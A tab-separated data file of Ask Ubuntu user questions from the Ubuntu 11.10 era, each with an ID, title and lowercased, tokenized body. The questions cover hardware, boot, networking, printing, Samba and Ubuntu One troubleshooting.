94505	bluetooth fails to get enabled ; unknown symbol security_sk_clone ( err 0 ) in dmesg	$ uname -a linux ubuntu1110 3.0.0-14-generic-pae # 23-ubuntu smp mon nov 21 22:07:10 utc 2011 i686 i686 i386 gnu/linux laptop model : lenovo w520 upon trying to enable bluetooth , the led turns on but , bluetooth is fails to get enabled in the preferences also seen below error message in dmesg [ 78183.389048 ] usb 1-1.4 : new full speed usb device number 19 using ehci_hcd [ 78183.504129 ] bluetooth : unknown symbol security_sk_clone ( err 0 ) [ 78183.505084 ] bluetooth : unknown symbol security_sk_clone ( err 0 ) [ 78183.505189 ] bluetooth : unknown symbol security_sk_clone ( err 0 ) [ 78183.505294 ] bluetooth : unknown symbol security_sk_clone ( err 0 )
94511	dual boot efi error : `` invalid arch independent elf magic ''	after installing ubuntu 11.10 on a pc which already has windows 7 i get this error : error : invalid arch independent elf magic . grub rescue > so i used supergrub boot disk to get into ubuntu . and made sure that grub-efi-amd64 package is present , and i ran sudo grub-install /dev/sda command . that also led to the same error . then i tried the solution given here and here . that also gave same error . fdisk -ul /dev/sda shows that boot partition ( /dev/sda1 ) is a msdos partition . /dev/sda6 is root partition and /dev/sda9 is the home partition . so , how can i solve this issue ?
94514	is there a printer driver for a fuji xerox docu print cm205b laser printer ?	i am very new to ubuntu , having sold windows based ( and msdos + cp/m ) computers for the last 30 years . how do i get a fuji xerox docu print cm205b laser printer working under ubuntu ?
94515	ca n't adjust brightness on a hp pavillion dv3	i can not adjust the screen brightness on my hp pavillion dv3-2154ca , using ubuntu 11.10 . my fn-f7/f8 keys do n't work ( they just show a changing screen brightness bar , with no effect ) , and adjusting 'screen brightness ' does nothing as well . i 'm new to ubuntu/linux , so simple answers would be much appreciated !
94517	how do i set a pppoe connection to redial ?	how to set auto redial in ubuntu 11.10 like windows xp where in windows xp it asks you the number how many times want to re-dial if connection gets dropped where you set the number of re-dial like 10,20 or 100 is there any option in ubuntu i can set the number of redial if connection drops ? please help my connection gets dropped every couple of hours or i have to get back to dumb windows ... . help me ... .
94520	ubuntu 11.10 blurry fonts	i 'm very new to linux as in i 've only been using it for about a week . my problem is fonts are incredibly blurry and it 's very difficult to read long periods of time . i 've tried to change fonts.conf file and added this : ! [ < ? xml version= '' 1.0 '' ? > < ! doctype fontconfig system `` fonts.dtd '' > < fontconfig > < match target= '' font '' > < edit mode= '' assign '' name= '' autohint '' > < bool > true < /bool > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' rgba '' > < const > none < /const > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' hinting '' > < bool > false < /bool > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' hintstyle '' > < const > hintnone < /const > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' antialias '' > < bool > true < /bool > < /edit > < /match > < /fontconfig > ] i also tried to use gnome tweak tool but hinting/ anti-aliasing does n't have any effect on browsers chrome/chromium/firefox . the methods i mentioned made some differences but the problem still exists , is there a way to get rid of this blurry effect or am i doomed for eternity ? thank you so much for your help ! windows 7 : ubuntu 11.10 :
94521	list python class properties	i would like to get list of python class properties . so i could make base class with function to get dict with all class properties name and value but without specifying exact properties .
94526	how do optimise the performance of remmina ?	i have installed remmina on my oneiric ubuntu laptop for home rdp access to my work windows 7 pc . this works , i can access my work pc etc ... however the performance is not what i had hoped . i am using the default settings for remmina , and after researching through google i have set my mouse pointers option on tehe windows 7 box to none . can any one else offer any advise on how to configure remmina prefernces to optimise the performance please ? thank you
94531	remaped the tab key to the caps lock key but caps locks still turning on and off ?	i created a .xmodmap file and added the following : keycode 66 = tab iso_left_tab tab iso_left_tab keycode 23 = caps_lock nosymbol caps_lock df so now my caps lock key works as a tab but the caps lock still turning on and off ( the caps light also turns on and off ) . how can do it so that the caps do n't turn on and off each time i press the caps lock key which now works as a tab ? edit : i realized that it is only the light that turns on and off . anyway , how to disable it ? ( if that 's something impossible to accomplish i guess i 'll just have to cover it with a sticker ) .
94534	bootmenu not appeared at boot time	i just installed ubuntu 11.10 along side with win7 . but it is not showing operating system select option at boot time , instead it boots to win7 directly . can anyone help me ...
94541	`` typeerror : type str dose n't support the buffer api '' while configuring gconf	`` a problem occurred while checking for updates '' i have noticed the red circle with white line for at least a week . not sure if it is due to a python version i changed to or and update that was cut in the middle . bottom line i can not go into my repositories and more . right click on the red circle with the light shows some options , like install all updates , but none respond . i did look into previous remarks about this problem , but seems none have resolved this issue yet . here is the output from doing sudo apt-get -f install e : sub-process /usr/bin/dpkg returned an error code ( 1 ) eyal @ eyal : ~ $ sudo apt-get -f install reading package lists ... done eyal @ eyal : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 8 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up ipython ( 0.10.2-1 ) ... traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 36 , in < module > from debpython.version import supported , debsorted , vrepr , \ file `` /usr/share/python/debpython/version.py '' , line 24 , in < module > from configparser import safeconfigparser importerror : no module named configparser dpkg : error processing ipython ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport writen becaouse maxreports is reached already errors were encountered while processing : ipython i did an update and try to install the packages : reading package lists ... building dependency tree ... reading state information ... 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up gconf2 ( 3.2.3-0ubuntu0.1 ) ... traceback ( most recent call last ) : file `` /usr/sbin/gconf-schemas '' , line 120 , in < module > trim ( os.path.join ( defaults_dest , '' % gconf-tree.xml '' ) , get_valid_languages ( ) ) file `` /usr/sbin/gconf-schemas '' , line 18 , in get_valid_languages langs.add ( l.split ( '_ ' ) [ 0 ] ) typeerror : type str does n't support the buffer api dpkg : error processing gconf2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up ipython ( 0.10.2-1 ) ... traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 36 , in < module > from debpython.version import supported , debsorted , vrepr , \ file `` /usr/share/python/debpython/version.py '' , line 24 , in < module > from configparser import safeconfigparser importerror : no module named configparser dpkg : error processing ipython ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of compiz-plugins-main-default : compiz-plugins-main-default depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing compiz-plugins-main-default ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : gconf2 ipython compiz-plugins-main-default e : sub-process /usr/bin/dpkg returned an error code ( 1 ) e : sub-process /usr/bin/dpkg returned an error code ( 1 ) seems the main problem is coming from : errors were encountered while processing : gconf2 ipython sudo dpkg -- configure gconf2 [ sudoo ] password for eyal : setting up conf2 ( 3.2.3-0ubuntu0.1 ) ... trackback ( most recent call last ) : file '/usr/sbin/gconf-schemas '' , line 120 , in < module > trim ( os.path.join ( defaults_dest , `` % gconf-tree.xml '' ) file '/usr/sbin/gconf-schemas '' , line 18 , in get_valid_languages langs.add ( l.split ( '_ ' ) [ 0 ] ) typeerror : type str dose n't support the buffer api dpkg error : error processing gconf2 ( -- configure ) : subprocess installed post-instalation script returned error exit satus 1 erros were encountered while processing : gconf2
94542	how can i repair my installation ?	does ubuntu 11.10 have a repair setup like windows that repairs the operating system files ? or do we have to do a whole new installation ? if not , is there a backup solution so i can re-install ubuntu and just use the backup file to put all my programs back etc ?
94545	how to get online on command line ?	i have installed ubuntu on vmware on my mac os x. i have installed vmware tools and had enabled network adaptor . but ubuntu still could not get online . i try ifconfig , but i only get 127.0.0.1 . i did the exact same step when i install window 7 and window xp on vmware and they can go online fine , wireless or ethernet . where on the command line in ubuntu i can attempt to setup my network access ? here 's my ifconfig -a.. eth0 link encap : ethernet hwaddr 00:0c:29:75:98:92 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:19 base address:0x2024 dingdong link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:8226 errors:0 dropped:0 overruns:0 frame:0 tx packets:8226 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1100875 ( 1.1 mb ) tx bytes:1100875 ( 1.1 mb )
94546	installation alongside windows xp with two pre-existing partitions	i currently have windows xp installed on my system . i wish to install ubuntu as the second os . i want that at startup i am prompted to select the os i wish to boot my system with . however , i am facing problems while creating the new partitions . my hard drive is presently partitioned into two drives , both of which contain data although there is 30gb of free space available in both the partitions . i am a little apprehensive about losing my data if i partition my drive incorrectly during ubuntu installation . kindly guide me through the installation procedure , especially the partitioning part of it . which option would be best suited ?
94548	why is there no recycle bin ?	why does n't ubuntu have their recycle bin/trash function the same as windows . in ubuntu there is trash folder , which functions exactly as a folder . there is no disk space difference after a file has been trashed . however in windows , it appears available memory will increase if i move file ( s ) to the recycle bin .
94549	why does mouse cursor disappear randomly over background image and desktop icons and sometimes foreground windows ?	ubuntu 11.10 64bit ( upgrade from 11.04 some months ago ) , system up-to-date . hp 6715b 4gb ram sometimes hitting [ esc ] will fix it on some foreground windows . it never shows over system settings , background or desktop icons ( which do flash a highlight as it passes over ) right now , it shows inside this ff window & ff tabs , but not ff top window status line ( name & max/min/close icons ) unless i left-click , when grab-hand appears . it rapidly changes from visible to invisible as it travels along the left & right edges of the ff window ( the 'resize ' icon flashes visible to invisible and back to visible as it traverses the border , ending up invisible over the desktop . i 've changed the system settings - appearance - theme a few times without fixing it .
94551	keyboard does n't work in certain applications when using an external monitor	when connect to external monitor and extend display to ext minitor , keyborad input does not work for certain application ( java ui , eg username , password input dialog ) . in single monitor mode , never has this type of problem . any suggestions ?
94552	unable to install , `` no root file system is defined ''	i am trying to feed the pressed to ubiquity while installing xubuntu 11.10 . following is what i used in preseeding , and i used debconf-set-selections to set the below preseed . ubiquity localechooser/preferred-locale select en_us.utf-8 ubiquity debconf/language string en ubiquity localechooser/languagelist select en ubiquity debian-installer/language string en ubiquity partman-auto/init_automatically_partition select 80custom__________custom keyboard-configuration keyboard-configuration/unsupported_options boolean false ubiquity partman/default_filesystem string ext4 ubiquity partman-auto/choose_recipe select myboot-root ubiquity partman-auto/expert_recipe string \ myboot-root : : \ 1 50 10240 ext4 \ $ primary { } $ bootable { } \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { / } \ . \ 64 512 8172 linux-swap \ method { swap } format { } \ . \ 500 10000 30720 ext4 \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /backup_fs } \ . \ 500 10000 10000000 ext4 \ method { format } format { } \ use_filesystem { } filesystem { ext4 } \ mountpoint { /home } \ . ubiquity partman/confirm_write_new_label boolean false ubiquity partman/choose_partition select finish ubiquity partman/confirm boolean true ubiquity partman-target/choose_method select 25filesystem__________ext4 and when i excute the ubiquity with -- automatic option , it ends up with the error no root file system is defined below is the information for debugging purpose .
94553	ubuntu one music does not allow ubuntu one cloud mode . can not stream	the ubuntu files app works fine on my new device ( philips go connect ( android ) ) but when i try the ubuntu one cloud mode on the ubuntu music app it does not manage to sign in but says `` oops something went wrong '' . this works fine on other devices on which i installed it a few months ago .
94554	how do you make seahorse ( gnome keyring ) store passwords for ssh keys in ?	i 'm trying to get seahorse to remember the password for an existing rsa key i 've copied across from another computer . when i use the key rather than gnome keyring prompting me for the password and storing it on the keyring i have to enter the password in terminal and the password is n't remembered ? how do i use seahorse to save my ssh key password ?
94555	how do i find exact status of my microphone mute or unmute or the volume level of mic using command line ?	this is very odd , i have one default microphone and i have another second microphone . when i use this command it always shows not muted but the microphone volume is 0 % . how or what is a way i can find those value accurately . $ pactl list | sed -n '/^source/ , /^ $ /p ' | grep mute mute : no mute : no mute : no
94562	ubuntu one sync specific folders to a special machine	i have around 4gb of data on my ubuntu one storage . today i 've installed ubuntu one on a terminal system of my college . the problem is , that the size of my home directory is limited to 500mb . so , if i start ubuntu one on that machine , my home directory is always full . is there a way , to tell the ubuntu-one client on that machine , only to sync a specific folder instead of pulling all available folders in the ubuntu-one-clound . regards , simon
94564	how to run multiple byobu sessions at once ?	currently i do n't seem able to run multiple sessions of byobu . after the initial byobu instance , running on one terminal , when i run byobu in another terminal it always attaches to the first byobu session . is there away to start independent byobu sessions ?
94566	mp3 player a8706 not detected as usb device	i 've got a a8706 mp3 player . when i plug it in , it charges but does n't mount . in xp mounting works perfectly fine . i 'm using 11.10 . what should i do ? thanks lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 0b97:7761 o2 micro , inc. oz776 1.1 hub bus 007 device 003 : id 0b97:7772 o2 micro , inc. oz776 ccid smartcard reader bus 002 device 000 : id 1e74:4641 coby electronics corporation
94569	how to get a mustek 1248 ub scanner working ?	i have a mustek 1248 ub scanner and ubuntu would recognize it but not scan from it , simple scan would tell me that it is unable to connect to the scanner and xsane would tell me failed to open device invalid argument gt68xx : libusb:002:007 i tried chmod but nothing happened .
94573	how do i stop xml copy editor from crashing when opening a file ?	i tried installing xml copy editor , and whenever i try to open an xml file in it , it crashes . it seems like it just shuts off , as though i clicked close , because it does n't generate and error log . how do i get it to work ?
94578	tvtime + saa7134 does n't work after upgrading to 11.10	when i used ubuntu 10.10 , my tvtime worked perfectly . after upgrading to ubuntu 11.10 , it only shows `` no signal '' . i 've searched throughout the internet for a whole day and could n't fix it . i also use windows xp at the same time and it works . here is my specification . ubuntu 11.10 . pinnacle pctv hybrid pro pci 310i ( philips saa7134 ) tvtime 1.0.2-6ubuntu1 ( i downgraded from 1.0.2-7ubuntu1 , default by ubuntu 10.10 ) i 'm in germany which means : pal/pal-bg and frequency table=europe here is for the information : $ lspci 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 01:01.0 multimedia controller : philips semiconductors saa7131/saa7133/saa7135 video broadcast decoder ( rev d1 ) 04:00.1 audio device : advanced micro devices [ amd ] nee ati rv620 hdmi audio [ radeon hd 3400 series ] $ cat /proc/asound/cards 0 [ intel ] : hda-intel - hda intel hda intel at 0xdfcf8000 irq 43 1 [ hdmi ] : hda-intel - hda ati hdmi hda ati hdmi at 0xdfffc000 irq 44 2 [ saa7134 ] : saa7134 - saa7134 saa7133 [ 0 ] at 0xdfdff800 irq 21 $ xawtv -hwscan this is xawtv-3.95.dfsg.1 , running on linux/i686 ( 3.0.0-14-generic ) looking for available devices port 143-146 type : xvideo , image scaler name : ati radeon avivo video /dev/video0 : ok [ -device /dev/video0 ] type : v4l2 name : pinnacle pctv 310i flags : overlay capture tuner $ dmesg | grep saa [ 4.484856 ] saa7130/34 : v4l2 driver version 0.2.16 loaded [ 4.484918 ] saa7134 0000:01:01.0 : pci int a - > gsi 21 ( level , low ) - > irq 21 [ 4.484924 ] saa7133 [ 0 ] : found at 0000:01:01.0 , rev : 209 , irq : 21 , latency : 64 , mmio : 0xdfdff800 [ 4.484931 ] saa7133 [ 0 ] : subsystem : 11bd:002f , board : pinnacle pctv 310i [ card=101 , insmod option ] ... [ 4.889137 ] saa7133 [ 0 ] : registered device video0 [ v4l2 ] [ 4.889169 ] saa7133 [ 0 ] : registered device vbi0 [ 4.889199 ] saa7133 [ 0 ] : registered device radio0 [ 4.933671 ] saa7134 alsa driver for dma sound loaded [ 4.933836 ] saa7133 [ 0 ] /alsa : saa7133 [ 0 ] at 0xdfdff800 irq 21 registered as card -2 [ 4.980908 ] dvb : registering new adapter ( saa7133 [ 0 ] ) $ dmesg | grep tuner [ 4.730294 ] i2c-core : driver [ tuner ] using legacy suspend method [ 4.730298 ] i2c-core : driver [ tuner ] using legacy resume method [ 4.824208 ] tuner 0-004b : tuner -1 found with type ( s ) radio tv . [ 4.856615 ] tuner-simple 0-004b : creating new instance [ 4.856620 ] tuner-simple 0-004b : type set to 61 ( tena tnf9533-d/if/tnf9533-b/df ) so my card=101 and tuner=61 , then tried to use rmmod and load it back with modprobe and it still shows `` no signal '' . $ modprobe saa7134 card=101 tuner=61 and if i run tvtime with verbose setting , it will show : $ sudo tvtime -v running tvtime 1.0.2 . reading configuration from /etc/tvtime/tvtime.xml reading configuration from /home/winnuayi/.tvtime/tvtime.xml cpuinfo : cpu intel ( r ) core ( tm ) 2 duo cpu e4500 @ 2.20ghz , family 6 , model 15 , stepping 13. cpuinfo : cpu measured at 2200.051mhz . xcommon : display :0.0 , vendor the x.org foundation , vendor release 11004000 xfullscreen : using xinerama for dual-head information . xfullscreen : pixels are square . xfullscreen : number of displays is 2. xfullscreen : head 0 at 0,0 with size 1680x1050 . xfullscreen : head 1 at 1680,0 with size 1680x1050 . xcommon : have xtest , will use it to ping the screensaver . xcommon : pixel aspect ratio 1:1. xcommon : pixel aspect ratio 1:1. xcommon : window manager is metacity and is ewmh compliant . xcommon : you are using metacity . disabling aspect ratio hints xcommon : since most deployed versions of metacity are still broken . xcommon : using ewmh state fullscreen property . xcommon : using ewmh state above property . xcommon : using ewmh state below property . xcommon : pixel aspect ratio 1:1. xcommon : displaying in a 768x576 window inside 768x576 space . xvoutput : using xvideo adaptor 143 : ati radeon avivo video . speedycode : using mmxext optimized functions . station : reading stationlist from /home/winnuayi/.tvtime/stationlist.xml videoinput : using video4linux2 driver 'saa7134 ' , card 'pinnacle pctv 310i ' ( bus pci:0000:01:01.0 ) . videoinput : version is 528 , capabilities 5010015. videoinput : maximum input width : 720 pixels . tvtime : sampling input at 720 pixels per scanline . xcommon : pixel aspect ratio 1:1. xcommon : displaying in a 768x576 window inside 768x576 space . xcommon : received a map , marking window as visible ( 59 ) . xcommon : pixel aspect ratio 1:1. xcommon : displaying in a 768x576 window inside 768x576 space . using $ scantv -c/dev/vbi0 , no signal could be detected . everything looks fine . alsamixer is also fine . i do n't know where the problem is . i 'll appreciate anyone who can show some hints . : )
94584	how to bind all the subdomains to 127.0.0.1 ?	i have a domain test.dev bound to 127.0.0.1 in /etc/hosts . how can i bind all the subdomains , e.g . any.th.ing.test.dev to 127.0.0.1 as well ?
94588	ubuntu one files are downloaded but not available	after purchasing some music on the u1 music store the files were synced from u1 to the computer where i purchased the albums ( ubuntu 11.04 ) . on a different machine ( ubuntu 11.10 ) only some tracks are synced and showing up the rest is not there . u1sdtool -- current-transfers was listing some of the missing files . after watching this process for a long ( very long ) time the downloads finally finished and disappeared from the current-tranfers list . but when i go to ~/.ubuntuone/purchased from ubuntu on/artist/album the directory is present but empty . why the is u1 downloading half of a day and then not showing the files ? is there any temporary place where the files are stored before copying them to their target location ? any suggestions what could be the problem ?
94590	repeated warning about updating my flash player	i have installed new firefox , however flash does n't work . when i visit for example youtube.com instead of vids i see info : please update your flash player . i am trying to use apturl package for ubuntu but it gets me a message that : this file can not be opened because `` apt '' is not recognized by any program . how to solve this issue ? thanks and regards , misery ps . : ubuntu 10.04 lts x64 flashplugin-nonfree or any other flash package do n't solve the problem below i wrote what finally helped : ]
94599	window snapping not working after uninstalled compiz ?	i have uninstalled compiz and expected that window snapping would start working again as per unity default . but it does not . how do i reenable window snapping ?
94601	how do i secure a tomcat installation ?	i have installed tomcat on my ubuntu home 11.10 system and can successfully access the test page online after port forwarding on 8080 within my router . i have not made any other changes to the router , ubuntu or the tomcat install , everything else has remained standard . i intend on using this to play around with java servlets and basic web development for my own personal use . what steps , if any , would you suggest i take to ensure this is secure ? should i change anything within the tomcat configuration ? this seemed like a good idea to limit access - http : //www.seankilleen.com/2010/09/how-to-allow-only-specific-ip-addresses_30.html but i am open to any other recommendations .
94602	is it possible to accept wired phone call ( rj11 ) ?	i have a toshiba laptop with ubuntu 11.10 installed , all works fine . if i connect a wired phone ( rj11 ) into the rj11 slot in my laptop and someone calls that phone , is it possible to accept a phone call from within ubuntu and use the laptop microphone/speakers to communicate ?
94603	linux set time from net at login	on my ubuntu 10.04 box i ( a user , not root ) can issue sudo net time set and it works great . i 'd prefer that the box get the net time on a more regular basis , or at least each time it gets logged in . so , i tried adding net time set to /etc/profile . that fails . i added stanzas that look like user all= ( all ) nopasswd : /usr/bin/net to /etc/sudoers ( using visudo ) . did n't help . i have never touched cron so i have no idea how to add a chron tab . ( does seem oxymoronic to depend on the system time to reset the system time . ) what is the best way to do this ? if it 's a cron job , i 'd appreciate a quick example . same questions but for the command service dhcp3-server restart ? ( yes , my box gets its address by dhcp , but its dhcp server controls 4 gigabit enet cards attached to high speed cameras . sometimes , at login ? bootup ? the dhcp server leaves me seeing only 1 camera . ) thanks in advance .
94605	telnet refusing traffic on arbitrary port over network in 11.10	i have written a python script to listen on port 2626 and executed the script . proof that localhost is listening tcp 0 0 127.0.0.1:2626 0.0.0.0 : * listen i can connect via telnet to this port over localhost with the following command : : ~ $ telnet localhost 2626 trying : :1 ... trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . however when i try to connect from a remote machine the connection gets refused . : ~ $ telnet 128.251.xxx.xxx 2626 trying 128.251.xxx.xxx ... telnet : unable to connect to remote host : connection refused i even issued the following command to accept traffic on port 2626 : sudo iptables -a input -p tcp -i eth0 -- dport 2626 -j accept what could be the reason telnet on port 2626 is refusing connections from remote machines and how can i fix it ?
94606	install ubuntu on external harddrive later use it as internal disk	i want to install ubuntu on a kind of firewall device , that has no usb-port or other connections except lan . ( i do n't want to setup a whole tftp etc ) . so i decided to install ubuntu on an external usb drive holding the 2,5 '' harddrive of my firewall . later i placed the harddrive into my firewall and hoped everything would be fine ( note , both are x86 architecture ) . unfortunately it is not working , the firewall tells me `` disk boot failure '' . do you have any idea why this is happening , and how i could fix it ? i suspected a grub problem , but even after mounting the usb harddrive in my running linux , chrooting in /mnt and reinstalling grub nothing changed . i would be very happy if you could help me on this one : ) tia
94607	how do i install the instant messaging application ip messenger ?	i 've recently downloaded g2ipmsg ( ip messenger for ubuntu 11.10 ) . however - this comes not as an installable package as previous ubuntu versions . thus i think i need to compile it . this application needs gtk so i 've installed libgtk2.0-dev using synaptic package manager . now when i run ./configure command it gives me the following error . checking for applet ... configure : error : package requirements ( libpanelapplet-2.0 ) were > not met : no package 'libpanelapplet-2.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables applet_cflags and applet_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . where can i find the path for pkg_config_path ? this is what i have done so far : i 've installed libxml-parser-perl , libgnomeui-dev , gettext , intltool according to the post installing ip messenger on ubuntu linux but could not find the package libpanel-applet2-dev . then i even tried to install libpanelappletmm-2.6-dev and libpanelappletmm-2.6-1c2 but could not find this packages but still get the same error configure : error : package requirements ( libpanelapplet-2.0 ) were not met there are lot of problems with g2ipmsg in ubuntu , specially there are lot of problems during file transfer . instead of installing ip messanger using wine or g2ipmsg use iptux . its perfectly compatible with ip messanger . installing iptux sudo apt-get install iptux
94612	how do i get a list of amazon regions via the command line ?	i 'd like to see how i can get a list of regions from aws on the command line so i can quickly look things up , how can i do this ?
94614	having google chrome developer tools open causes pages to not render/load properly	i can not find anyone else who is affected by this bug , so i am reluctant to believe it is actually a bug with google chrome . to better understand what i am dealing with here i have created a short video of what is happening . http : //www.youtube.com/watch ? v=wmhbj_k8upy it appears javascript is not executed while the developer tools are open however i can not be certain that is the only issue . i have un-installed google chrome and chromium and removed their associated folders in the ~/.cache directory . then re-installed chrome using sudo apt-get install google-chrome-stable however the problem persists . any help tracking down why this is happening and how i might circumvent it would be greatly appreciated !
94619	how to set cpu limit for given process permanently . cpulimit and nice do n't work	there are many similar questions but none of them help me with my problem . i have ubuntu 11.10 on server ( it 's desktop version ) . i have a running website on it . there is one process that is very important , but do n't have to be run on high priority . i want to permanently limit cpu usage for process , not for user . this process is run by exec function ( it 's php function , not system process ) . so i see 2 options : 1 . add some kind of limit every time function is executed . 2 . limit cpu usage permanently for this process . i have tried to use `` nice '' and cpulimit , but nothing seems to work . nice do n't have any effect and cpulimit ( with -e ) says : `` no target process found '' . i am quite a beginer , so please assume i know almost nothing .
94622	how to add a user environment aware application launcher to unity panel ?	here is my problem : when i search from unity 's dash home for netbeans and drag & drop it to unity launcher it , i observed that netbeans does not have access to my environment variables which were defined in my .bashrc file as follows ... export scala_home=/usr/local/typesafe-stack ... when i run netbeans from the gnome-terminal i do n't observe that problem about the environment variable . i also made a desktop file instead . here is how i defined my netbeans.desktop file : [ desktop entry ] type=application name=netbeans ide 7.0.1 icon=/usr/local/netbeans-7.0.1/nb/netbeans.png exec=netbeans terminal=false categories=development ; ide ; startupnotify=false how can i modify this file so that it will be aware of the user 's environment variables ? thanks in advance , yours sincerely . ciuncan
94623	adding programs to run off cd	i want to run ubuntu from a cd and add a set of custom programs to the cd so they will be there each time i boot . how do i accomplish this ?
94625	black blocks and lines on screen	i often get lines and blocks on screen . some of them disappear after scrolling application window back and forth , but some of them do n't . seems like something is wrong with screen refresh or compiz or xorg . i 'm using 11.10 x64 with gnome 3 on asus x54l , intel core duo b800 . sceens of the error : any idea how to get rid of this error ?
94626	what is the best `` file shredder '' to remove files from my system .	i need a program to permanently remove files from my system similar to file shredder
94633	how do i watch movies and shows on my laptop using ubuntu tv ?	i compiled and in installed ubuntu tv using ubuntu-tv/wiki site . when i run it , though , it ca n't play tv shows . it says unity-2d-shell : [ warning ] gstreamer ; unable to play - `` file : ///home/ubuntu/videos/unity/local/epg/epg.mkv i am assuming that i need an epg file . i have also tried running ~/ubuntu-tv/shell/dash/epgdata/refreshdata.py but with no luck . does ubuntu tv need to be a `` tv '' to watch movies and shows ? what 's going on ?
94637	hp laserjet p1102	i just installed ubuntu this morning and i want to know how to install this printer . ubuntu recognizes it but does n't print , it just tells me job completed without doing anything , tried hp-setup , hplip but nothing worked please help edit : it worked magically after hp-setup after deleting all printers tahnk you
94640	samba changes file ownership ! how do i get rid of that problem ?	i am running a samba server ( version 3.5.6 ) . the file sharing is ok until i realize that samba changes file ownership when another user ( not the original owner ) edit the file and saves it . this is particularly true , if i have set admin users parameter to administrate the share . the strange thing is only the file ownership get changed but 'directory ownership ' remain unchanged ( which is desirable ) : ) options like force user and force group are not going to work here because , sharing directory have a different sub-directories that belong to many users . configuration for the share looks like this [ staff ] comment = `` staff members only '' path = /path/to/staff browseable = yes valid users = @ staff , @ managers , @ moderators write list = @ staff , @ managers create mask = 0640 directory mask = 0750 admin users = @ moderators` as you can see , members in above-mentioned groups are allowed to read others data but only members of @ moderators can do changes to file & directories . problem arises when a member of @ moderators modifies a file ( not a directory ) that belong to another user ( belong to @ staff or @ managers ) , the ownership of that edited file changes to root ! ! ! which is totally undesirable . i want to preserve the ownership of the file to its original creator even after a member of @ moderators modifies it . how do i achieve this ? ? ? thank you in advanced .
94642	would ubuntu tv work outside usa when installed on a pc ?	i 've seen the blurbs about ubuntu tv being able to receive from cable and it has epg and so on , and i 'd love to install it on a regular pc that is currently running windows media center . i do n't merely want to have a media player ; i specifically want to be able to watch and record live tv via a tuner expansion card . i have tried installing mythtv earlier , but i failed miserably because the instructions i used were us-centric but i 'm in austria ( europe ) . i could n't find a way to make the tv tuner work right . i 'm concerned that this time , again , ubuntu tv will only work really well in the usa . given that i 'm in non-us country `` x '' , what are my chances of getting ubuntu tv to work well , specifically with regard to receiving local-region epg data and also aerial and cable tv signals in pal and dvb-t formats ?
94644	what is the best way to create secure/encrypted system ?	i want to set up a development machine . since during the development there might be some sensitive data i will have to work on - intellectual property is the main issue . i would like to have a secure/encrypted system , so that if the machine gets into wrong hands , the data is still secure . so the question is , how can i achieve that under linux ? i heard about truecrypt , but it seems that i ca n't do a boot time encryption . so i have to use some strategy with encrypted home folder + something else . in which case ubuntu has something built in , no ? but the question is , how good is the built in system , and what happens with temp data , that is known to spill out of home directory into unencrypted directories . anyone have any suggestions ?
94647	why can libqwt-dev be stuck in upgrade and how to fix this ?	every time i run apt-get update and apt-get dist-upgrade then , i get libqwt-dev in `` the following packages will be upgraded '' list . every time . if i update and upgrade right after i 've already done it it is there again . and no error messages saying it failed to upgrade . any ideas ? below is the output : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be upgraded : libqwt-dev 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/99.8 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 287922 files and directories currently installed . ) preparing to replace libqwt-dev 6.0.0-1ubuntu1 ( using ... /libqwt-dev_6.0.0-1ubuntu1_i386.deb ) ... unpacking replacement libqwt-dev ... setting up libqwt-dev ( 6.0.0-1ubuntu1 ) ...
94649	how to mount a zip file as a file system ?	can i mount a zip ( or other non-solid ( so that accessing a file would n't decompress the whole archive ) compressed archive format file ) as a file system in ubuntu ?
94654	is there any way to get a true white color ?	is there any way to get a true white color in ubuntu ? i tried changing the theme to adwaita cupertino . still , my home`s background , including the background of right-click menu is having a small yellowish color . is there any way to tweak this behaviour ? i also tried macbuntu . still the problem persists . are these themes supposed to be like that in ubuntu ? no pure white ?
94655	live cd/pen drive boot option to go to tty1 instead of unity ?	i am wondering if there is any boot option to prevent precise from loading unity and instead going straight to the terminal ( because each time it tries to do so , it crashes ) . from the command line my idea is to install the nvidia-current package to see if i can finally fix the problem . thanks !
